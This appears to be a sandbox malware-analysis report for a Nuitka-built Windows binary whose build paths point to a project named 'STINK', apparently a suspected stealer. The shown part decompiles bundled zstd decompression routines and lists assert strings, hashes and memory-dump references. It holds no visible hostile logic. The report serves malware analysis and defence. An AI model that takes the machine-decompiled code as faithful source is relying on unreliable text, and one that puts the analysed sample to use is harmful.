diff >= 8 || (ovtype == ZSTD_no_overlap && diff <= -WILDCOPY_VECLEN), xrefs: 00405744, 00405849, 00405B2E
op < oMatchEnd, xrefs: 00405B5C
match >= prefixStart, xrefs: 00405411
oLitEnd <= oend_w, xrefs: 004055BD
C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/decompress/zstd_decompress_block.c, xrefs: 004051C2, 0040540A, 0040542D, 004055B6, 004055D6, 004055F6, 00405616, 00405636, 0040565D, 00405A2B, 00405A4F, 00405B55

Memory Dump Source

Source File: 00000000.00000002.234542689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234535818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234552756.0000000000428000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234560655.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234568049.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234568049.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: _assertmemcpy
String ID: *ip <= *op$*op - *ip >= 8$C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/common/bitstream.h$C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/common/zstd_internal.h$C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/decompress/zstd_decompress_block.c$diff >= 8 || (ovtype == ZSTD_no_overlap && diff <= -WILDCOPY_VECLEN)$diff >= WILDCOPY_VECLEN || diff <= -WILDCOPY_VECLEN$match >= prefixStart$nbBits < BIT_MASK_SIZE$oLitEnd < oMatchEnd$oLitEnd <= oend_w$oMatchEnd <= oend$ofBits <= MaxOff$op != NULL$op < oMatchEnd$op <= oLitEnd$op <= oMatchEnd$sequence.matchLength >= 1
API String ID: 1759651462-4012456843
Opcode ID: 233f18390672edd70762d55800ad63825b852e518e623b8fb8e7d5dce241fb85
Instruction ID: 0ed69338c93c4b102dc8ac02e190f8274cdf5643289fbbd0ef89de8e34b90f77
Opcode Fuzzy Hash: 233f18390672edd70762d55800ad63825b852e518e623b8fb8e7d5dce241fb85
Instruction Fuzzy Hash: FC429E72705AC586DB20CF19E8443AE7761F385784F84822ADB8D577A9EF3CC599CB08

Uniqueness

Uniqueness Score: -1.00%

Function 00402C00 Relevance: 37.1, APIs: 10, Strings: 11, Instructions: 305
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_assert.MSVCRT ref: 00402E92
_assert.MSVCRT ref: 00402F06
_assert.MSVCRT ref: 00402F25
_assert.MSVCRT ref: 00402F44
_assert.MSVCRT ref: 00402F63
_assert.MSVCRT ref: 00402F82
_assert.MSVCRT ref: 00402FA1
_assert.MSVCRT ref: 004030A2
_assert.MSVCRT ref: 004030C1
_assert.MSVCRT ref: 00403102

Strings

position == 0, xrefs: 00402F1E, 0040309B
tableSize <= 512, xrefs: 00402F9A, 004030F9
val != 0, xrefs: 00402EFF
tableSize % unroll == 0, xrefs: 004030BA
normalizedCounter[s]>=0, xrefs: 00402E8B
wkspSize >= ZSTD_BUILD_FSE_TABLE_WKSP_SIZE, xrefs: 00402F3D
maxSymbolValue <= MaxSeq, xrefs: 00402F7B
C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/common/bitstream.h, xrefs: 00402DDD
tableLog <= MaxFSELog, xrefs: 00402F5C
nbAdditionalBits[symbol] < 255, xrefs: 00402EC6
C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/decompress/zstd_decompress_block.c, xrefs: 00402E7E, 00402EB5, 00402F17, 00402F36, 00402F55, 00402F74, 00402F93, 00403094, 004030B3, 004030F2

Memory Dump Source

Source File: 00000000.00000002.234542689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234535818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234552756.0000000000428000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234560655.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234568049.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234568049.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: _assert
String ID: C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/common/bitstream.h$C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/decompress/zstd_decompress_block.c$maxSymbolValue <= MaxSeq$nbAdditionalBits[symbol] < 255$normalizedCounter[s]>=0$position == 0$tableLog <= MaxFSELog$tableSize % unroll == 0$tableSize <= 512$val != 0$wkspSize >= ZSTD_BUILD_FSE_TABLE_WKSP_SIZE
API String ID: 1222420520-173631386
Opcode ID: ad47579f494587566aff32373c93c7d0e27b533bfb7843c7e68bf111f6fc8825
Instruction ID: 4f4a2220f8d72b58ed86939e9b3b2351b714ed2b175e2251c63103eb1adcf219
Opcode Fuzzy Hash: ad47579f494587566aff32373c93c7d0e27b533bfb7843c7e68bf111f6fc8825
Instruction Fuzzy Hash: 96C1237231569187DB20CF15E94879E7721F794B84F85812AEF4913BD8EBBCC949CB08

Uniqueness

Uniqueness Score: -1.00%

Function 0041DCF0 Relevance: 28.2, APIs: 11, Strings: 5, Instructions: 163
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcsicmp.MSVCRT ref: 0041DD66
_wcsicmp.MSVCRT ref: 0041DD7D
_wcsicmp.MSVCRT ref: 0041DD94
_wcsicmp.MSVCRT ref: 0041DDAB

Strings

TEMP, xrefs: 0041DD5C
PID, xrefs: 0041DD8A
TIME, xrefs: 0041DDA1
%lld, xrefs: 0041DE41
PROGRAM, xrefs: 0041DD73

Memory Dump Source

Source File: 00000000.00000002.234542689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234535818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234552756.0000000000428000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234560655.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234568049.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234568049.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: _wcsicmp
String ID: %lld$PID$PROGRAM$TEMP$TIME
API String ID: 2081463915-209724506
Opcode ID: 73fa149ae4d25ec62c3c218f9009c7d8b6c79d5166027912828323f79d2f2ed6
Instruction ID: 3f6ca52b6ec2d5889901236797f371f7673c8e2c76762d6726aabd6e38623750
Opcode Fuzzy Hash: 73fa149ae4d25ec62c3c218f9009c7d8b6c79d5166027912828323f79d2f2ed6
Instruction Fuzzy Hash: 5F51C1E6B2076181EF25AF21A9017FA6261BB54BC5FD49027DE0A4B754EB3CC986C30D

Uniqueness

Uniqueness Score: -1.00%

Function 00402040 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 218
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_assert.MSVCRT ref: 00402269
_assert.MSVCRT ref: 00402303
_assert.MSVCRT ref: 0040235D

Strings

position == 0, xrefs: 00402356
val != 0, xrefs: 0040225E
tableSize % unroll == 0, xrefs: 004022FC
C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/common/fse_decompress.c, xrefs: 004022F5, 0040234F
C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/common/bitstream.h, xrefs: 00402257

Memory Dump Source

Source File: 00000000.00000002.234542689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234535818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234552756.0000000000428000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234560655.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234568049.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234568049.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: _assert
String ID: C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/common/bitstream.h$C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/common/fse_decompress.c$position == 0$tableSize % unroll == 0$val != 0
API String ID: 1222420520-682188271
Opcode ID: b51fe0d72fa06ffdb6a5f565e59db979274a7a3eb5dba48222efb4dfc2a78d5d
Instruction ID: 408338ec6870eaed148d99f30d10b2b0f8cf0027a57d2f6e58b057d98de810db
Opcode Fuzzy Hash: b51fe0d72fa06ffdb6a5f565e59db979274a7a3eb5dba48222efb4dfc2a78d5d
Instruction Fuzzy Hash: 9A8141723146A186DB24CF29D9407AE3761F388B98F84C226EF9A237D4EB7DC955C704

Uniqueness

Uniqueness Score: -1.00%

Function 00409F80 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 393
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 27%

			E00409F80(void* __eax, void* __rbx, void* __rcx, void* __rdx, void* __r8, void* __r14) {
				void* _t113;
				void* _t140;
				void* _t142;

				_t113 = __eax;
				 *((long long*)(_t142 + 0x40)) = __rdx + (( *(_t140 + 6) & 0x000000ff) << 0x30) + (( *(_t140 + 5) & 0x000000ff) << 0x28) + (( *(_t140 + 4) & 0x000000ff) << 0x20) + (( *(_t140 + 3) & 0x000000ff) << 0x18) + (( *(_t140 + 2) & 0x000000ff) << 0x10) + (( *(_t140 + 1) & 0x000000ff) << 8);
				if(__eax != 0) {
					__rdx = __al & 0x000000ff;
					__rax = 0x9;
					asm("enter 0x0, 0x0");
					__rsi =  *((intOrPtr*)(__rsp + 0xe0));
					__eax = __eax - r9d;
					asm("bsr edx, edx");
					__rax = 0x9 << 3;
					__rdi = __rdi + __rbx;
					r12d =  *( *((intOrPtr*)(__rsp + 0xe0)) + 2) & 0x000000ff;
					__rsi = __rbp;
					__rax = (0x9 << 3) - (__al & 0x000000ff);
					 *((long long*)(__rsp + 0x20)) = __rdi;
					__rdi =  *((intOrPtr*)(__rsp + 0xe0));
					 *(__rsp + 0x48) = 0x9;
					__rdi =  *((intOrPtr*)(__rsp + 0xe0)) + 4;
					r9d = r12d;
					 *(__rsp + 0x28) = __r14;
					__r14 = __rbp;
					__rbp = __rsi;
					r9d =  ~r9d;
					r9d = r9d & 0x0000003f;
					asm("o16 nop [eax+eax]");
					do {
						if( *(__rsp + 0x28) <= __rbp) {
							__rdx = __rax;
							__rax = __rax & 0x00000007;
							__rdx = __rdx >> 3;
							 *(__rsp + 0x48) = __rax;
							r15d = __eax;
							__rax =  *((intOrPtr*)(__rsp + 0x20));
							__rbp = __rbp - __rdx;
							__r13 =  *__rbp;
							__rax =  *((intOrPtr*)(__rsp + 0x20)) - 7;
							 *(__rsp + 0x40) = __r13;
							if(__rbx <  *((intOrPtr*)(__rsp + 0x20)) - 7) {
								L22:
								if(r12d == 0) {
									r8d = 0x175;
									__rdx = "C:\\Users\\mac\\Desktop\\STINK-~1.0\\STINK-~1.0\\venv\\lib\\SITE-P~1\\nuitka\\build\\inline_copy\\zstd/common/bitstream.h";
									__rcx = "nbBits >= 1";
									__imp___assert();
								}
								__r13 = __r13 << __cl;
								__rcx = __rsi;
								__rax = __r13 << __cl >> __cl;
								__rdx = __rdi + (__r13 << __cl >> __cl) * 4;
								__rax =  *__rdx & 0x0000ffff;
								 *__rbx = __ax;
								__rax =  *(__rdx + 2) & 0x000000ff;
								r15d = r15d + __eax;
								__rax =  *(__rdx + 3) & 0x000000ff;
								__r13 = __r13 << __cl;
								__rcx = __rsi;
								__rbx = __rbx + __rax;
								__rdx = __r13 << __cl >> __cl;
								__r11 = __rdi + (__r13 << __cl >> __cl) * 4;
								if(r12d == 0) {
									__r10 = __imp___assert;
									 *(__rsp + 0x38) = __r11;
									r8d = 0x175;
									__rdx = "C:\\Users\\mac\\Desktop\\STINK-~1.0\\STINK-~1.0\\venv\\lib\\SITE-P~1\\nuitka\\build\\inline_copy\\zstd/common/bitstream.h";
									__rcx = "nbBits >= 1";
									 *(__rsp + 0x30) = __r10;
									__eax =  *__r10();
									__r11 =  *(__rsp + 0x38);
									__r10 =  *(__rsp + 0x30);
									r8d = 0x175;
									__rdx = "C:\\Users\\mac\\Desktop\\STINK-~1.0\\STINK-~1.0\\venv\\lib\\SITE-P~1\\nuitka\\build\\inline_copy\\zstd/common/bitstream.h";
									__rcx = "nbBits >= 1";
									__eax =  *__r11 & 0x0000ffff;
									 *__rbx = __ax;
									__eax = __r11[1] & 0x000000ff;
									r15d = r15d + (__r11[1] & 0x000000ff);
									__eax = __r11[1] & 0x000000ff;
									__rbx = __rbx + __rax;
									__eax =  *( *(__rsp + 0x30))();
									__rax = __r13;
									__r10 =  *(__rsp + 0x30);
									__rax = __r13 << __cl;
									__rcx = __rsi;
									r8d = 0x175;
									__rax = __r13 << __cl >> __cl;
									__rcx = "nbBits >= 1";
									__rdx = __rdi + (__r13 << __cl >> __cl) * 4;
									__rax =  *__rdx & 0x0000ffff;
									 *__rbx = __ax;
									__rax =  *(__rdx + 2) & 0x000000ff;
									r15d = r15d + (__r11[1] & 0x000000ff);
									__rax =  *(__rdx + 3) & 0x000000ff;
									__rdx = "C:\\Users\\mac\\Desktop\\STINK-~1.0\\STINK-~1.0\\venv\\lib\\SITE-P~1\\nuitka\\build\\inline_copy\\zstd/common/bitstream.h";
									__rbx = __rbx + __rax;
									__eax =  *( *(__rsp + 0x30))();
								} else {
									__eax =  *__r11 & 0x0000ffff;
									__rdx = __r13;
									 *__rbx = __ax;
									__eax = __r11[1] & 0x000000ff;
									r15d = r15d + (__r11[1] & 0x000000ff);
									__eax = __r11[1] & 0x000000ff;
									__rdx = __r13 << __cl;
									__rcx = __rsi;
									__rbx = __rbx + __rax;
									__rdx = __r13 << __cl >> __cl;
									__rdx = __rdi + (__r13 << __cl >> __cl) * 4;
									__rax =  *__rdx & 0x0000ffff;
									 *__rbx = __ax;
									__rax =  *(__rdx + 2) & 0x000000ff;
									r15d = r15d + __eax;
									__rax =  *(__rdx + 3) & 0x000000ff;
									__rbx = __rbx + ( *(__rdx + 3) & 0x000000ff);
								}
								goto L25;
							}
							L39:
							__rsi = __rbp;
							__rbp = __r14;
							__r14 =  *(__rsp + 0x28);
							L8:
							__rax =  *((intOrPtr*)(__rsp + 0x20));
							__rcx =  *(__rsp + 0x48);
							__r9 = __rax - 2;
							if(__rcx > 0x40) {
								L13:
								if(__r9 < __rbx) {
									if( *((intOrPtr*)(__rsp + 0x20)) <= __rbx) {
										L18:
										if(__rbp == __rsi) {
											__r8 =  *((intOrPtr*)(__rsp + 0xc8));
											if( *(__rsp + 0x48) != 0x40) {
												goto L19;
											}
											goto L1;
										}
										goto L19;
									}
									__r14 =  *(__rsp + 0x40);
									if(r12d != 0) {
										L44:
										__rdx =  *(__rsp + 0x48);
										__r10 = __r14;
										__rcx = __rdx;
										__r10 = __r14 << __cl;
										__rcx =  ~__rdx;
										__r10 = __r14 << __cl >> __cl;
										__rax = __rdi + (__r14 << __cl >> __cl) * 4;
										__rcx =  *__rax & 0x000000ff;
										 *__rbx = __cl;
										if( *(__rax + 3) == 1) {
											 *(__rsp + 0x48) = __rdx;
											goto L18;
										}
										if(__rdx > 0x3f) {
											goto L18;
										}
										__rdx = __rdx + __rax;
										if(__rdx <= 0x40) {
											 *(__rsp + 0x48) = __rdx;
											goto L18;
										}
										__r8 =  *((intOrPtr*)(__rsp + 0xc8));
										if(__rbp != __rsi) {
											goto L19;
										}
										goto L1;
									}
									__rax = __imp___assert;
									 *(__rsp + 0x38) = __imp___assert;
									L43:
									__rax =  *(__rsp + 0x38);
									r8d = 0x175;
									__rdx = "C:\\Users\\mac\\Desktop\\STINK-~1.0\\STINK-~1.0\\venv\\lib\\SITE-P~1\\nuitka\\build\\inline_copy\\zstd/common/bitstream.h";
									__rcx = "nbBits >= 1";
									__eax =  *( *(__rsp + 0x38))();
									__r14 =  *(__rsp + 0x40);
									goto L44;
								}
								r11d = r12d;
								__r14 =  *(__rsp + 0x40);
								r15d =  *(__rsp + 0x48);
								r11d =  ~r11d;
								r11d = r11d & 0x0000003f;
								if(r12d == 0) {
									__rax = __imp___assert;
									 *(__rsp + 0x28) = r12d;
									__r13 = "nbBits >= 1";
									__r12 = __r9;
									 *(__rsp + 0x30) = __rsi;
									__r15 = __r14;
									r14d = r11d;
									 *(__rsp + 0x38) = __rax;
									 *(__rsp + 0xd0) = __rbp;
									__rbp = __rbx;
									__rbx = __rax;
									asm("o16 nop [eax+eax]");
									do {
										__rdx = "C:\\Users\\mac\\Desktop\\STINK-~1.0\\STINK-~1.0\\venv\\lib\\SITE-P~1\\nuitka\\build\\inline_copy\\zstd/common/bitstream.h";
										__rcx = __r13;
										r8d = 0x175;
										__eax =  *__rbx();
										__rcx = __rsi;
										__r15 = __r15 << __cl;
										__rdx = __r15 << __cl >> __cl;
										__rdx = __rdi + (__r15 << __cl >> __cl) * 4;
										__rcx =  *__rdx & 0x0000ffff;
										 *__rbp = __cx;
										__rcx =  *(__rdx + 2) & 0x000000ff;
										__rdx =  *(__rdx + 3) & 0x000000ff;
										__rsi = __rsi + __rcx;
										__rbp = __rbp + __rdx;
										 *(__rsp + 0x48) = __rsi;
									} while (__r12 >= __rbp);
									__rbx = __rbp;
									r12d =  *(__rsp + 0x28);
									__rsi =  *(__rsp + 0x30);
									__rbp =  *(__rsp + 0xd0);
									if( *((intOrPtr*)(__rsp + 0x20)) <= __rbx) {
										goto L18;
									}
									goto L43;
								}
								do {
									__r14 = __r14 << __cl;
									__rax = __r14 << __cl >> __cl;
									__rax = __rdi + (__r14 << __cl >> __cl) * 4;
									__rdx =  *__rax & 0x0000ffff;
									 *__rbx = __dx;
									__rdx =  *(__rax + 2) & 0x000000ff;
									__rax =  *(__rax + 3) & 0x000000ff;
									r15d = r15d + __edx;
									__rbx = __rbx + __rax;
								} while (__rbx <= __r9);
								 *(__rsp + 0x48) = r15d;
								if( *((intOrPtr*)(__rsp + 0x20)) > __rbx) {
									goto L44;
								}
								goto L18;
							}
							__eax = r12d;
							__rax = __rax & 0x0000003f;
							r13d = r12d;
							if(__r14 <= __rsi) {
								L31:
								__rcx = __rcx >> 3;
								__rsi = __rsi - (__rcx >> 3);
								__rax = __rcx;
								__r15 =  *__rsi;
								__rax = __rcx & 0x00000007;
								 *(__rsp + 0x48) = __rax;
								 *(__rsp + 0x40) = __r15;
								if(__rbx > __r9) {
									goto L13;
								}
								if(r12d != 0) {
									L29:
									__rcx = __rax;
									__r15 = __r15 << __cl;
									__rdx = __rdi + __r15 * 4;
									__rcx =  *__rdx & 0x0000ffff;
									 *__rbx = __cx;
									__rcx =  *(__rdx + 2) & 0x000000ff;
									__rcx = ( *(__rdx + 2) & 0x000000ff) + __rax;
									__rax =  *(__rdx + 3) & 0x000000ff;
									 *(__rsp + 0x48) = __rcx;
									__rbx = __rbx + ( *(__rdx + 3) & 0x000000ff);
									if(__rcx > 0x40) {
										goto L13;
									}
									if(__r14 > __rsi) {
										goto L10;
									}
									goto L31;
								}
								L34:
								 *(__rsp + 0x30) = __r9;
								r8d = 0x175;
								__rdx = "C:\\Users\\mac\\Desktop\\STINK-~1.0\\STINK-~1.0\\venv\\lib\\SITE-P~1\\nuitka\\build\\inline_copy\\zstd/common/bitstream.h";
								__rcx = "nbBits >= 1";
								 *(__rsp + 0x28) = __rax;
								__imp___assert();
								__r9 =  *(__rsp + 0x30);
								__rax =  *(__rsp + 0x28);
								goto L29;
							}
							L10:
							if(__rbp == __rsi) {
								goto L13;
							}
							__rax = __rcx;
							__r8 = __rsi;
							__rax = __rcx >> 3;
							__rdx = __rax;
							__r8 = __rsi - __rax;
							if(__rbp <= __r8) {
								__rdx = __rax * 8;
								__r15 =  *__r8;
								__rax = __rcx;
								__rsi = __r8;
								__rax = __rcx - __rdx;
								 *(__rsp + 0x48) = __rax;
								 *(__rsp + 0x40) = __r15;
								if(__rbx > __r9) {
									goto L13;
								}
								if(r12d == 0) {
									goto L34;
								}
								goto L29;
							}
							__rax = __rsi;
							__rax = __rsi - __rbp;
							__rdx = __rax;
							__rax = __rax << 3;
							__rsi = __rsi - __rdx;
							__rcx = __rcx - __rax;
							__rax =  *__rsi;
							 *(__rsp + 0x48) = __rcx;
							 *(__rsp + 0x40) =  *__rsi;
							goto L13;
						}
						if(__r14 == __rbp) {
							goto L39;
						}
						__rdx = __rax;
						__rcx = __rbp;
						__rdx = __rax >> 3;
						r8d = __edx;
						__rcx = __rbp - __r8;
						if(__r14 <= __rcx) {
							__rdx = __rdx << 3;
							__r13 =  *__rcx;
							 *(__rsp + 0x48) = __rax;
							r15d = __eax;
							__rax =  *((intOrPtr*)(__rsp + 0x20));
							 *(__rsp + 0x40) = __r13;
							__rax =  *((intOrPtr*)(__rsp + 0x20)) - 7;
							if(__rbx >=  *((intOrPtr*)(__rsp + 0x20)) - 7) {
								__rbp = __r14;
								__rsi = __rcx;
								__r14 =  *(__rsp + 0x28);
								goto L8;
							}
							__rbp = __rcx;
							goto L22;
						}
						__rsi = __rbp;
						__rbp = __r14;
						__r14 =  *(__rsp + 0x28);
						__rdx = __rsi;
						__rdx = __rsi - __rbp;
						__rcx = __rdx;
						__rax = __rax - __rdx;
						__rsi = __rsi - __rcx;
						 *(__rsp + 0x48) = __rax;
						__rax =  *__rsi;
						 *(__rsp + 0x40) =  *__rsi;
						goto L8;
						L25:
						__r13 = __r13 << __cl;
						__rcx = __rsi;
						__rdx = __rdi + __r13 * 4;
						__rax =  *__rdx & 0x0000ffff;
						 *__rbx = __ax;
						__rax =  *(__rdx + 2) & 0x000000ff;
						__rdx =  *(__rdx + 3) & 0x000000ff;
						__eax = __eax + r15d;
						 *(__rsp + 0x48) = __rax;
						__rbx = __rbx + __rdx;
					} while (__rax <= 0x40);
					__rax =  *((intOrPtr*)(__rsp + 0x20));
					__rsi = __rbp;
					__rbp = __r14;
					__r9 =  *((intOrPtr*)(__rsp + 0x20)) - 2;
					goto L13;
				}
				L1:
				return _t113;
			}

0x00409f80
0x00409fc2
0x00409fc9
0x00409fcf
0x00409fd2
0x00409fdb
0x00409fdf
0x00409fe7
0x00409fea
0x00409fed
0x00409ff0
0x00409ff3
0x00409ff8
0x00409ffb
0x00409ffd
0x0040a002
0x0040a00a
0x0040a00e
0x0040a012
0x0040a015
0x0040a01a
0x0040a01d
0x0040a020
0x0040a023
0x0040a02a
0x0040a030
0x0040a035
0x0040a3e0
0x0040a3e2
0x0040a3e5
0x0040a3e8
0x0040a3ec
0x0040a3ef
0x0040a3f4
0x0040a3f7
0x0040a3fb
0x0040a3ff
0x0040a407
0x0040a189
0x0040a18c
0x0040a3c0
0x0040a3c6
0x0040a3cd
0x0040a3d4
0x0040a3d4
0x0040a198
0x0040a19b
0x0040a19d
0x0040a1a0
0x0040a1a4
0x0040a1a7
0x0040a1aa
0x0040a1ae
0x0040a1b1
0x0040a1bb
0x0040a1be
0x0040a1c0
0x0040a1c3
0x0040a1c6
0x0040a1cd
0x0040a318
0x0040a31f
0x0040a324
0x0040a32a
0x0040a331
0x0040a338
0x0040a33d
0x0040a340
0x0040a345
0x0040a34a
0x0040a350
0x0040a357
0x0040a35e
0x0040a362
0x0040a365
0x0040a36a
0x0040a36d
0x0040a372
0x0040a375
0x0040a37b
0x0040a37e
0x0040a383
0x0040a386
0x0040a388
0x0040a38e
0x0040a391
0x0040a398
0x0040a39c
0x0040a39f
0x0040a3a2
0x0040a3a6
0x0040a3a9
0x0040a3ad
0x0040a3b4
0x0040a3b7
0x0040a1d3
0x0040a1d3
0x0040a1d7
0x0040a1da
0x0040a1dd
0x0040a1e2
0x0040a1e5
0x0040a1ed
0x0040a1f0
0x0040a1f2
0x0040a1f5
0x0040a1f8
0x0040a1fc
0x0040a1ff
0x0040a202
0x0040a206
0x0040a209
0x0040a20d
0x0040a20d
0x00000000
0x0040a1cd
0x0040a410
0x0040a410
0x0040a413
0x0040a416
0x0040a082
0x0040a082
0x0040a087
0x0040a08b
0x0040a092
0x0040a0df
0x0040a0e2
0x0040a5a5
0x0040a144
0x0040a147
0x0040a56d
0x0040a575
0x00000000
0x00000000
0x00000000
0x0040a57b
0x00000000
0x0040a147
0x0040a5ab
0x0040a5b3
0x0040a511
0x0040a511
0x0040a515
0x0040a518
0x0040a51a
0x0040a520
0x0040a522
0x0040a525
0x0040a529
0x0040a52c
0x0040a532
0x0040a596
0x00000000
0x0040a596
0x0040a537
0x00000000
0x00000000
0x0040a541
0x0040a546
0x0040a5ca
0x00000000
0x0040a5ca
0x0040a54c
0x0040a557
0x00000000
0x00000000
0x00000000
0x0040a55d
0x0040a5b9
0x0040a5c0
0x0040a4f1
0x0040a4f1
0x0040a4f6
0x0040a4fc
0x0040a503
0x0040a50a
0x0040a50c
0x00000000
0x0040a50c
0x0040a0e8
0x0040a0eb
0x0040a0f0
0x0040a0f5
0x0040a0f8
0x0040a0ff
0x0040a450
0x0040a457
0x0040a45c
0x0040a463
0x0040a466
0x0040a46e
0x0040a471
0x0040a474
0x0040a479
0x0040a481
0x0040a484
0x0040a487
0x0040a490
0x0040a490
0x0040a497
0x0040a49a
0x0040a4a0
0x0040a4a2
0x0040a4a7
0x0040a4ad
0x0040a4b0
0x0040a4b4
0x0040a4b7
0x0040a4bb
0x0040a4bf
0x0040a4c3
0x0040a4c5
0x0040a4c8
0x0040a4cc
0x0040a4d1
0x0040a4d4
0x0040a4d9
0x0040a4de
0x0040a4eb
0x00000000
0x00000000
0x00000000
0x0040a4eb
0x0040a108
0x0040a10e
0x0040a114
0x0040a117
0x0040a11b
0x0040a11e
0x0040a121
0x0040a125
0x0040a129
0x0040a12c
0x0040a12f
0x0040a134
0x0040a13e
0x00000000
0x00000000
0x00000000
0x0040a13e
0x0040a094
0x0040a099
0x0040a09c
0x0040a0a2
0x0040a2b8
0x0040a2ba
0x0040a2bd
0x0040a2c0
0x0040a2c2
0x0040a2c5
0x0040a2c8
0x0040a2cc
0x0040a2d4
0x00000000
0x00000000
0x0040a2dd
0x0040a280
0x0040a280
0x0040a282
0x0040a28b
0x0040a28f
0x0040a292
0x0040a295
0x0040a299
0x0040a29b
0x0040a29f
0x0040a2a3
0x0040a2a9
0x00000000
0x00000000
0x0040a2b2
0x00000000
0x00000000
0x00000000
0x0040a2b2
0x0040a2e0
0x0040a2e0
0x0040a2e5
0x0040a2eb
0x0040a2f2
0x0040a2f9
0x0040a2fd
0x0040a303
0x0040a308
0x00000000
0x0040a308
0x0040a0a8
0x0040a0ab
0x00000000
0x00000000
0x0040a0ad
0x0040a0af
0x0040a0b2
0x0040a0b5
0x0040a0b7
0x0040a0bd
0x0040a258
0x0040a25f
0x0040a262
0x0040a264
0x0040a267
0x0040a269
0x0040a26d
0x0040a275
0x00000000
0x00000000
0x0040a27e
0x00000000
0x00000000
0x00000000
0x0040a27e
0x0040a0c3
0x0040a0c6
0x0040a0c9
0x0040a0cb
0x0040a0ce
0x0040a0d1
0x0040a0d3
0x0040a0d6
0x0040a0da
0x00000000
0x0040a0da
0x0040a03e
0x00000000
0x00000000
0x0040a044
0x0040a046
0x0040a049
0x0040a04c
0x0040a04f
0x0040a055
0x0040a160
0x0040a163
0x0040a168
0x0040a16c
0x0040a16f
0x0040a174
0x0040a179
0x0040a180
0x0040a5d3
0x0040a5d6
0x0040a5d9
0x00000000
0x0040a5d9
0x0040a186
0x00000000
0x0040a186
0x0040a05b
0x0040a05e
0x0040a061
0x0040a066
0x0040a069
0x0040a06c
0x0040a071
0x0040a073
0x0040a076
0x0040a07a
0x0040a07d
0x00000000
0x0040a210
0x0040a213
0x0040a216
0x0040a21b
0x0040a21f
0x0040a222
0x0040a225
0x0040a229
0x0040a22d
0x0040a230
0x0040a234
0x0040a237
0x0040a240
0x0040a245
0x0040a248
0x0040a24b
0x00000000
0x0040a24b
0x00409f4a
0x00409f5d

APIs

_assert.MSVCRT ref: 0040A2FD

Strings

C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/common/bitstream.h, xrefs: 0040A2EB, 0040A32A, 0040A350, 0040A3AD, 0040A3C6, 0040A490, 0040A4FC
nbBits >= 1, xrefs: 0040A2F2, 0040A331, 0040A357, 0040A391, 0040A3CD, 0040A45C, 0040A503
